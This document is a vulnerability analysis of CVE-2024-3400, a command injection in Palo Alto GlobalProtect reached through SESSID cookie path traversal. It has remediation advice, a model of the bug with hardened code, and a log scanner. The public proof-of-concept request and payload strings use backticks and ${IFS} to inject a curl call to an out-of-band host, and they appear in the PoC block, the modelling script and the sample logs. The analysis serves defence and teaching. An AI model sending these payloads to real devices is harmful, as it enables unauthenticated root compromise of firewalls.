Full Report
While fuzzing the GlobalProtect interface of a Palo Alto firewall, the watchTowr researchers noticed some interesting behaviour in the logs. Appending a semicolon to the `SESSID` cookie value produced a strange entry: `failed to unmarshal session(peekaboo) map, EOF`. The EOF stands for end of file, which is super interesting: it means the service is reading a file named from the session ID, and with our semicolon in the name there is no populated file to read, so the read hits end of file at once. This is where the bug begins!

Adding a slash, so the value looks like a directory component, gives the nicer error `failed to load file`. Sick! It is reading a file and we control the name. What about directory traversal? If the directory cannot be found, the service attempts to create it, and if the file does not exist it simply creates a zero-byte file with the supplied name intact. By itself this does not seem to have much impact. However, weird primitives break security assumptions elsewhere that are no longer true, so all we have to do is find some rule that we can now violate.

The telemetry code ingests log files, and to transfer each one it builds a curl command and runs it through a shell. Now an arbitrary file name sits inside a bash command, and that earlier primitive looks a lot nicer. While playing around with this, the researchers found that spaces were not allowed in cookie values, so we have to get creative: `${IFS}` expands to whitespace in bash and stands in for a space. Create a file whose name contains bash metacharacters such as semicolons or backticks, and we can inject arbitrary commands. For instance, creating a file in the logs directory via traversal with `curl${IFS}x1.outboundhost.com` in the name produces an outbound curl request. Neat!

Although not mentioned in the original post, the vulnerability appears to be within an underlying library called Gorilla sessions, so this arbitrary file write primitive likely affects a lot more than just this application. Overall, an awesome post on a bizarre command injection.
This took a weird arbitrary file write to trigger, but it was interesting. To me, the takeaway is that fuzzing is useful, but it is not launch-and-forget. Reading the error messages, responses and all other available information to look for weird behaviour is worthwhile.
Analysis Summary
# Vulnerability: Unauthenticated Remote Code Execution in Palo Alto Networks GlobalProtect
## CVE Details
- **CVE ID:** CVE-2024-3400
- **CVSS Score:** 10.0 (Critical)
- **CWE:** CWE-77 (Improper Neutralization of Special Elements used in a Command) / CWE-22 (Path Traversal)
## Affected Systems
- **Products:** Palo Alto Networks PAN-OS software.
- **Versions:**
- PAN-OS 10.2 (below 10.2.9-h1)
- PAN-OS 11.0 (below 11.0.4-h1)
- PAN-OS 11.1 (below 11.1.2-h3)
- **Configurations:** Firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both).
- *Note:* While initially believed to require "Device Telemetry" to be enabled, subsequent updates confirmed the vulnerability is exploitable even if telemetry is disabled.
## Vulnerability Description
The vulnerability is a two-stage flaw involving arbitrary file creation and command injection.
1. **Directory Traversal/File Creation:** The GlobalProtect service (`gpsvc`) does not validate the `SESSID` cookie before using it to locate a session file. Dot-dot-slash (`../`) sequences therefore walk out of the session directory, and if the resulting path does not exist the service creates a zero-byte file there, with the attacker-supplied name intact.
2. **Command Injection:** A background device-telemetry job periodically transfers collected logs with `curl`, building the command as a shell string that incorporates the file names found in `/opt/panlogs/tmp/device_telemetry/minute/`. Since the first primitive lets an attacker choose those file names, a name containing shell metacharacters (backticks, semicolons, `${IFS}` in place of spaces) is interpreted by the shell, yielding root-level command execution.
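As an added illustration (not code from the watchTowr post, PAN-OS or `gpsvc`), the following Python models both stages: a file-backed session store that concatenates the `SESSID` cookie into a path, beside a hardened version that allow-lists the token and pins the path to the session directory, and a telemetry job that splices a file name into a shell string, beside an argv form run without a shell. The session directory, the upload URL and the stub `curl` that only records its arguments are assumptions; the stub keeps the run offline while showing what the shell actually executes.

```python
"""Model of the two-stage bug described above: a file-backed session store that
trusts the SESSID cookie, and a telemetry job that splices file names from the
spool directory into a shell command. This is an added illustration, not PAN-OS
or gpsvc code; SESSION_DIR, UPLOAD_URL and the stub curl are assumptions."""
import os
import re
import stat
import subprocess
import tempfile

SESSION_DIR = "/tmp/sslvpn"                                  # assumed session store
TELEMETRY_DIR = "/opt/panlogs/tmp/device_telemetry/minute"   # from the advisory
UPLOAD_URL = "https://telemetry.example/upload"              # assumed placeholder
SESSID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")               # allow-list for tokens

# PoC-style name: backticks inject a command, ${IFS} stands in for the space
# that cookie values cannot carry.
PAYLOAD = "exploit`curl${IFS}oob-check.example`;"


def session_file_vulnerable(session_dir, sessid):
    """Naive concatenation: '/../' in SESSID walks out of session_dir, and the
    store later creates an empty file at whatever path this returns."""
    return os.path.normpath(session_dir + "/" + sessid)


def session_file_hardened(session_dir, sessid):
    """Allow-list the token, then confirm the resolved path stays in session_dir."""
    if not SESSID_RE.fullmatch(sessid):
        raise ValueError("SESSID is not a valid session token")
    base = os.path.realpath(session_dir)
    path = os.path.realpath(os.path.join(base, sessid))
    if os.path.dirname(path) != base:
        raise ValueError("SESSID escapes the session directory")
    return path


def hardened_rejects(session_dir, sessid):
    """True when the hardened store refuses the token."""
    try:
        session_file_hardened(session_dir, sessid)
    except ValueError:
        return True
    return False


def telemetry_command_vulnerable(filename):
    """Shell string with the file name spliced in; the shell interprets ` and ;."""
    return f"curl -F file=@{TELEMETRY_DIR}/{filename} {UPLOAD_URL}"


def telemetry_argv_safe(filename):
    """argv list run without a shell: the name is one argument whatever it holds."""
    if not filename or os.path.basename(filename) != filename:
        raise ValueError("expected a bare file name")
    return ["curl", "-F", f"file=@{TELEMETRY_DIR}/{filename}", UPLOAD_URL]


def run_with_stub_curl(command, shell):
    """Execute `command` with a stub `curl` first on PATH that only appends its
    arguments to a log file, and return the recorded invocations in order.
    Nothing reaches the network; the stub is a tiny sh script written here."""
    with tempfile.TemporaryDirectory() as tmp:
        log = os.path.join(tmp, "curl.log")
        stub = os.path.join(tmp, "curl")
        with open(stub, "w") as fh:
            fh.write('#!/bin/sh\nprintf "%s\\n" "$*" >> "$CURL_LOG"\n')
        os.chmod(stub, stat.S_IRWXU)
        env = {"PATH": tmp + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin"),
               "CURL_LOG": log}
        subprocess.run(command, shell=shell, env=env,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        if not os.path.exists(log):
            return []
        with open(log) as fh:
            return fh.read().splitlines()


if __name__ == "__main__":
    traversal = "/../../../opt/panlogs/tmp/device_telemetry/minute/" + PAYLOAD
    print("vulnerable store writes:", session_file_vulnerable(SESSION_DIR, traversal))
    print("hardened store rejects it:", hardened_rejects(SESSION_DIR, traversal))
    print("shell string ->", run_with_stub_curl(telemetry_command_vulnerable(PAYLOAD), shell=True))
    print("argv list    ->", run_with_stub_curl(telemetry_argv_safe(PAYLOAD), shell=False))
```

With the shell string, the stub is invoked twice: first by the backtick substitution, with `oob-check.example` as its only argument, and then by the outer command, whose `-F` argument has been truncated at the backtick while the original upload URL is left to be executed as a separate command. With the argv list the stub runs once and receives the whole hostile name, backticks and all, as a single argument.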
## Exploitation
- **Status:** Exploited in the wild (Zero-day activity observed). PoC is publicly available.
- **Complexity:** Low
- **Attack Vector:** Network (Unauthenticated)
## Impact
- **Confidentiality:** Total (Root access to the firewall)
- **Integrity:** Total
- **Availability:** Total
## Remediation
### Patches
Palo Alto Networks has released updates to address this flaw. Users should upgrade to:
- PAN-OS 10.2.9-h1 or later
- PAN-OS 11.0.4-h1 or later
- PAN-OS 11.1.2-h3 or later
### Workarounds
- **Threat Prevention Subscription:** Customers with an active subscription can block attacks by enabling **Threat ID 95187** (and ensuring vulnerability protection is applied to the GlobalProtect interface).
- **Disable Telemetry:** (Legacy advice, now superseded by patching as it was found that disabling telemetry does not fully mitigate the risk).
## Detection
- **Indicators of Compromise (IoC):**
- Look for unexpected zero-byte files in `/opt/panlogs/tmp/device_telemetry/minute/`.
- Monitor for shell metacharacters (e.g., `` ` ``, `${IFS}`, `;`) within `SESSID` cookie values in web server logs.
- **Detection Method:** The public PoC is a crafted POST to `/ssl-vpn/hipreport.esp` whose `SESSID` cookie carries the traversal path and the injected command; `${IFS}` stands in for the space that cookie values cannot contain:

```http
POST /ssl-vpn/hipreport.esp HTTP/1.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/exploit`curl${IFS}oob-check.com`;
```
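To turn the indicators above into something runnable, here is an added Python scanner (not a Palo Alto tool) that pulls `SESSID` values out of gpsvc-style error lines and out of access-log lines with a logged Cookie header, flags traversal and shell metacharacters, and lists zero-byte files in a spool directory. The log line layout and the sample lines are constructed for the example; only the quoted gpsvc message text comes from the page.

```python
"""Detection helpers for the two indicators listed above: SESSID values carrying
traversal or shell metacharacters in logs, and unexpected zero-byte files in the
telemetry spool. Added example, not a vendor tool; the log line layout below is
constructed for the example and only the quoted gpsvc message text is from the page."""
import os
import re
import tempfile

TELEMETRY_DIR = "/opt/panlogs/tmp/device_telemetry/minute"   # from the advisory

# gpsvc error quoted on the page; the session ID is echoed inside the parentheses.
UNMARSHAL_RE = re.compile(r"failed to unmarshal session\((.*)\) map")
# Assumed access-log style with the Cookie header logged; value runs to space or quote.
COOKIE_RE = re.compile(r'SESSID=([^\s"]+)')
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
METACHAR_RE = re.compile(r"[`;|&$(){}<>\n]")

# Constructed sample lines (not real logs).
SAMPLE_LOG = """\
2024-04-10 12:00:01 gpsvc debug: failed to unmarshal session(peekaboo) map, EOF
2024-04-10 12:00:02 gpsvc debug: failed to unmarshal session(9f3c2a1d) map, EOF
2024-04-10 12:00:03 gpsvc debug: failed to unmarshal session(/../../../opt/panlogs/tmp/device_telemetry/minute/probe) map, EOF
2024-04-10 12:00:04 gpsvc debug: failed to unmarshal session(/../../../opt/panlogs/tmp/device_telemetry/minute/exploit`curl${IFS}oob-check.example`;) map, EOF
10.0.0.5 - - [10/Apr/2024:12:00:05 +0000] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 cookie="SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/exploit`curl${IFS}oob-check.example`;"
10.0.0.6 - - [10/Apr/2024:12:00:06 +0000] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 cookie="SESSID=9f3c2a1d"
""".splitlines()


def extract_sessid(line):
    """Return the SESSID seen in a log line, or None if the line carries none."""
    for pattern in (UNMARSHAL_RE, COOKIE_RE):
        m = pattern.search(line)
        if m:
            return m.group(1)
    return None


def classify_sessid(sessid):
    """Reasons a SESSID value looks hostile; empty list for a normal token."""
    reasons = []
    if TRAVERSAL_RE.search(sessid):
        reasons.append("traversal")
    if METACHAR_RE.search(sessid):
        reasons.append("shell-metachar")
    return reasons


def scan_log(lines):
    """Return (line number, sessid, reasons) for every suspicious SESSID value."""
    hits = []
    for n, line in enumerate(lines, 1):
        sessid = extract_sessid(line)
        if sessid is None:
            continue
        reasons = classify_sessid(sessid)
        if reasons:
            hits.append((n, sessid, reasons))
    return hits


def zero_byte_files(directory):
    """Names of empty regular files in `directory`, sorted; any such file in the
    telemetry spool is unexpected and should be triaged."""
    out = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and os.path.getsize(path) == 0:
            out.append(name)
    return out


def demo_zero_byte_scan():
    """Build a throwaway spool with one empty and one real file and scan it."""
    with tempfile.TemporaryDirectory() as spool:
        open(os.path.join(spool, "probe"), "w").close()
        with open(os.path.join(spool, "telemetry-2024-04-10.tgz"), "w") as fh:
            fh.write("not empty")
        return zero_byte_files(spool)


if __name__ == "__main__":
    for n, sessid, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n}: {reasons} -> {sessid}")
    print("zero-byte files in demo spool:", demo_zero_byte_scan())
    print("on a real appliance, point zero_byte_files() at", TELEMETRY_DIR)
```

A plain traversal with no metacharacters (line 3 of the sample) is still worth alerting on: it is the file-creation primitive being probed, and the file it leaves behind is exactly the zero-byte artefact the second check looks for.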
## References
- **Vendor Advisory:** hxxps://advisories[.]paloaltonetworks[.]com/advisory/cve-2024-3400/
- **Original Analysis:** hxxps://labs[.]watchtowr[.]com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
- **Volexity Incident Report:** hxxps://www[.]volexity[.]com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/